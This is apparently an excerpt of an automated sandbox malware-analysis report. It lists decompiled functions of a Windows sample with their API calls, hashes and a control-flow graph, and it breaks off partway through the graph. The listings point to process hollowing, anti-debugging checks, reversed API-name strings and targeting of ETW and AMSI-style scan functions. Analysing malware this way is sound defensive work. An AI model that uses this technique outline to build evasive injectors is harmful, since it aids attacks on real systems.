                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule$AddressProc$MemoryReadVirtual
                                                                                        • String ID: ntdll$yromeMlautriVdaeRtN
                                                                                        • API String ID: 2521977463-737317276
                                                                                        • Opcode ID: 4fe163adfc6ecae244d0f3bcf02bdbb98a51d0bc72d18c6b5862653d6e33dbf4
                                                                                        • Instruction ID: 3976147d0fe3327558a10d0407bf0d3985119e7ba86eda2502cab677a2799ebd
                                                                                        • Opcode Fuzzy Hash: 4fe163adfc6ecae244d0f3bcf02bdbb98a51d0bc72d18c6b5862653d6e33dbf4
                                                                                        • Instruction Fuzzy Hash: 7E018C79600208AFEB01EFA8DC59F9EB7FEEB4C700F818420B502D7650D630A9048F35
                                                                                        Function 027E7D78 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 027E8098: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027E8108,?,?,00000000,?,027E7A7E,ntdll,00000000,00000000,027E7AC3,?,?,00000000), ref: 027E80D6
                                                                                          • Part of subcall function 027E8098: GetModuleHandleA.KERNELBASE(?), ref: 027E80EA
                                                                                          • Part of subcall function 027E8140: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027E81C8,?,?,00000000,00000000,?,027E80E1,00000000,KernelBASE,00000000,00000000,027E8108), ref: 027E818D
                                                                                          • Part of subcall function 027E8140: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027E8193
                                                                                          • Part of subcall function 027E8140: GetProcAddress.KERNEL32(?,?), ref: 027E81A5
                                                                                        • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 027E7DEC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                                                        • String ID: Ntdll$yromeMlautriVetirW
                                                                                        • API String ID: 2719805696-3542721025
                                                                                        • Opcode ID: 542b5209f7f1e97550275743dd26ed702da1cd73ad970fcc290396a75edae737
                                                                                        • Instruction ID: 470bdd61d940c82849884b80620b905e2c527ff47094f591dcbcfb1fc29199c2
                                                                                        • Opcode Fuzzy Hash: 542b5209f7f1e97550275743dd26ed702da1cd73ad970fcc290396a75edae737
                                                                                        • Instruction Fuzzy Hash: EB018C79600208AFEB05EFA8D85AE9AB7FDEB4C700F518864B502DB640D630AD148F74
                                                                                        Function 027E853C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 027E8098: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027E8108,?,?,00000000,?,027E7A7E,ntdll,00000000,00000000,027E7AC3,?,?,00000000), ref: 027E80D6
                                                                                          • Part of subcall function 027E8098: GetModuleHandleA.KERNELBASE(?), ref: 027E80EA
                                                                                          • Part of subcall function 027E8140: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027E81C8,?,?,00000000,00000000,?,027E80E1,00000000,KernelBASE,00000000,00000000,027E8108), ref: 027E818D
                                                                                          • Part of subcall function 027E8140: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027E8193
                                                                                          • Part of subcall function 027E8140: GetProcAddress.KERNEL32(?,?), ref: 027E81A5
                                                                                        • NtUnmapViewOfSection.NTDLL(?,?), ref: 027E85A1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule$AddressProc$SectionUnmapView
                                                                                        • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                        • API String ID: 3503870465-2520021413
                                                                                        • Opcode ID: a2aec7ec5a36c23c40a55e6a3a32739f5ff277555c9dc6949faad25c999710bd
                                                                                        • Instruction ID: 667e621c3df57fdbbb04fc00b5f97b0027d2e8eb4414e4923dbdd21c5c4e45e2
                                                                                        • Opcode Fuzzy Hash: a2aec7ec5a36c23c40a55e6a3a32739f5ff277555c9dc6949faad25c999710bd
                                                                                        • Instruction Fuzzy Hash: FE016DB8640208BFEB11EBA4DD59F5EBBFEEB4C714F918460B402D7650DA30A9048E35
                                                                                        Function 027EDEA4 Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • Rt.N(?,?,00000000,027EDF72), ref: 027EDF20
                                                                                        • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,027EDF72), ref: 027EDF36
                                                                                        • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,027EDF72), ref: 027EDF55
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: Path$DeleteFileNameName_
                                                                                        • String ID:
                                                                                        • API String ID: 4284456518-0
                                                                                        • Opcode ID: feee4cddee16ccc849673cdc9b4b2a5aa4a96b3e0fd568bc8f0a47bd880fa085
                                                                                        • Instruction ID: 31868c32112264d5b84956b80603befb59388fc809a73feb8457e239f5682e42
                                                                                        • Opcode Fuzzy Hash: feee4cddee16ccc849673cdc9b4b2a5aa4a96b3e0fd568bc8f0a47bd880fa085
                                                                                        • Instruction Fuzzy Hash: 9A01D675A442487EEF12E7A0CD9ABCD77BDAB49300F5004D2D211F7081DA30AB088B71
                                                                                        Function 027EDEF8 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 027D4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 027D4F2E
                                                                                        • Rt.N(?,?,00000000,027EDF72), ref: 027EDF20
                                                                                        • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,027EDF72), ref: 027EDF36
                                                                                        • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,027EDF72), ref: 027EDF55
                                                                                          • Part of subcall function 027D4C60: SysFreeString.OLEAUT32(027EF798), ref: 027D4C6E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: PathString$AllocDeleteFileFreeNameName_
                                                                                        • String ID:
                                                                                        • API String ID: 1530111750-0
                                                                                        • Opcode ID: ad64351bc3a147d3aee5164ba1e9464b6f87384a82a44bfa4bbf3f52b96eadcf
                                                                                        • Instruction ID: 98484f54284729e639ff1feb2617556f6a181fc465302b4cf0866192a43abb6f
                                                                                        • Opcode Fuzzy Hash: ad64351bc3a147d3aee5164ba1e9464b6f87384a82a44bfa4bbf3f52b96eadcf
                                                                                        • Instruction Fuzzy Hash: DB014471940208BADB12EBA0CD96FDEB7FDDB49700F5044A1E601E6180EA74AB048A75
                                                                                        Function 027E6DC8 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 027E6D6C: CLSIDFromProgID.OLE32(00000000,?,00000000,027E6DB9,?,?,?,00000000), ref: 027E6D99
                                                                                        • CoCreateInstance.OLE32(?,00000000,00000005,027E6EAC,00000000,00000000,027E6E2B,?,00000000,027E6E9B), ref: 027E6E17
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFromInstanceProg
                                                                                        • String ID:
                                                                                        • API String ID: 2151042543-0
                                                                                        • Opcode ID: d5e6a360ae420c6379cd9d0935e8f183a809ebf7dc1b913ff98a9e838b16752f
                                                                                        • Instruction ID: 9b0cbc3f403dcc89f16dcdaec5e63770ecdd77ae7a70201d8cab3679f94c83b7
                                                                                        • Opcode Fuzzy Hash: d5e6a360ae420c6379cd9d0935e8f183a809ebf7dc1b913ff98a9e838b16752f
                                                                                        • Instruction Fuzzy Hash: 2B01DF71208704AEEF12EF61DC2286FBBBDE74DB00B910879F406E2680E6309900C970
                                                                                        Function 027EFABC Relevance: 220.8, APIs: 8, Strings: 113, Instructions: 9098COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • InetIsOffline.URL(00000000,00000000,027FB99E,?,?,?,00000305,00000000,00000000), ref: 027EFAF6
                                                                                          • Part of subcall function 027E889C: LoadLibraryA.KERNEL32(00000000,00000000,027E8983), ref: 027E88D0
                                                                                          • Part of subcall function 027E889C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,027E8983), ref: 027E88E0
                                                                                          • Part of subcall function 027E889C: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 027E88F9
                                                                                          • Part of subcall function 027E889C: FreeLibrary.KERNEL32(74AE0000,00000000,0282B388,Function_0000662C,00000004,0282B398,0282B388,000186A3,00000040,0282B39C,74AE0000,00000000,00000000,00000000,00000000,027E8983), ref: 027E8963
                                                                                          • Part of subcall function 027EF9DC: GetModuleHandleW.KERNEL32(KernelBase,?,027EFDE0,UacInitialize,0282B37C,027FB9D4,UacScan,0282B37C,027FB9D4,ScanBuffer,0282B37C,027FB9D4,OpenSession,0282B37C,027FB9D4,ScanString), ref: 027EF9E2
                                                                                          • Part of subcall function 027EF9DC: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 027EF9F4
                                                                                          • Part of subcall function 027EFA38: GetModuleHandleW.KERNEL32(KernelBase), ref: 027EFA48
                                                                                          • Part of subcall function 027EFA38: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 027EFA5A
                                                                                          • Part of subcall function 027EFA38: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 027EFA71
                                                                                          • Part of subcall function 027D7E5C: GetFileAttributesA.KERNEL32(00000000,?,027F0714,ScanString,0282B37C,027FB9D4,OpenSession,0282B37C,027FB9D4,ScanString,0282B37C,027FB9D4,UacScan,0282B37C,027FB9D4,UacInitialize), ref: 027D7E67
                                                                                          • Part of subcall function 027DC364: GetModuleFileNameA.KERNEL32(00000000,?,00000105,0291F8C4,?,027F0A46,ScanBuffer,0282B37C,027FB9D4,OpenSession,0282B37C,027FB9D4,ScanBuffer,0282B37C,027FB9D4,OpenSession), ref: 027DC37B
                                                                                          • Part of subcall function 027EE064: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,027EE134), ref: 027EE09F
                                                                                          • Part of subcall function 027EE064: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,027EE134), ref: 027EE0CF
                                                                                          • Part of subcall function 027EE064: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 027EE0E4
                                                                                          • Part of subcall function 027EE064: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 027EE110
                                                                                          • Part of subcall function 027EE064: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 027EE119
                                                                                          • Part of subcall function 027D7E80: GetFileAttributesA.KERNEL32(00000000,?,027F3891,ScanString,0282B37C,027FB9D4,OpenSession,0282B37C,027FB9D4,ScanBuffer,0282B37C,027FB9D4,OpenSession,0282B37C,027FB9D4,Initialize), ref: 027D7E8B
                                                                                          • Part of subcall function 027D8048: CreateDirectoryA.KERNEL32(00000000,00000000,?,027F3A2F,OpenSession,0282B37C,027FB9D4,ScanString,0282B37C,027FB9D4,Initialize,0282B37C,027FB9D4,ScanString,0282B37C,027FB9D4), ref: 027D8055
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Module$AddressHandleProc$AttributesLibraryNamePath$CheckCloseCreateDebuggerDirectoryFreeInetInformationLoadName_OfflineOpenPresentQueryReadRemote
                                                                                        • String ID: .url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                                                                        • API String ID: 2044571854-184510087
                                                                                        • Opcode ID: 4d88536e74b4559dae4bd485161a7462ba406c3bbcf723a673e621b2469f94bf
                                                                                        • Instruction ID: 3c4b08234970c144253658b5cabe0b23ff09f0b4f9402b1eaedd44ba74cfde20
                                                                                        • Opcode Fuzzy Hash: 4d88536e74b4559dae4bd485161a7462ba406c3bbcf723a673e621b2469f94bf
                                                                                        • Instruction Fuzzy Hash: A0143C39A1425D8BDF52EB65DC95ADEB3B6FF88300F1040E2A549AB310DB30AE95CF51
                                                                                        Function 027F82F8 Relevance: 160.3, APIs: 5, Strings: 85, Instructions: 2771processthreadCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 4578 27f82f8-27f86e7 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d48ec 4693 27f86ed-27f88c0 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d47ec call 27d49a0 call 27d4d74 call 27d4df0 CreateProcessAsUserW 4578->4693 4694 27f9571-27f96f4 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d48ec 4578->4694 4802 27f893e-27f8a49 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c 4693->4802 4803 27f88c2-27f8939 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c 4693->4803 4783 27f96fa-27f9709 call 27d48ec 4694->4783 4784 27f9ea0-27fb4a5 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d46d4 * 2 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c * 16 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27e7c10 call 27e8204 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c ExitProcess 4694->4784 4783->4784 4794 27f970f-27f99e2 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27ef388 call 27d4860 call 27d49a0 call 27d46d4 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d7e5c 4783->4794 5052 27f9c9a-27f9e9b call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d49f8 call 27e8c28 4794->5052 5053 27f99e8-27f9c95 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4de0 * 2 call 27d4764 call 27edf80 4794->5053 4902 27f8a4b-27f8a4e 4802->4902 4903 27f8a50-27f8d70 call 27d49f8 call 27ee144 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27ed01c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c 4802->4903 4803->4802 4902->4903 5221 27f8d89-27f956c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c ResumeThread call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c CloseHandle call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 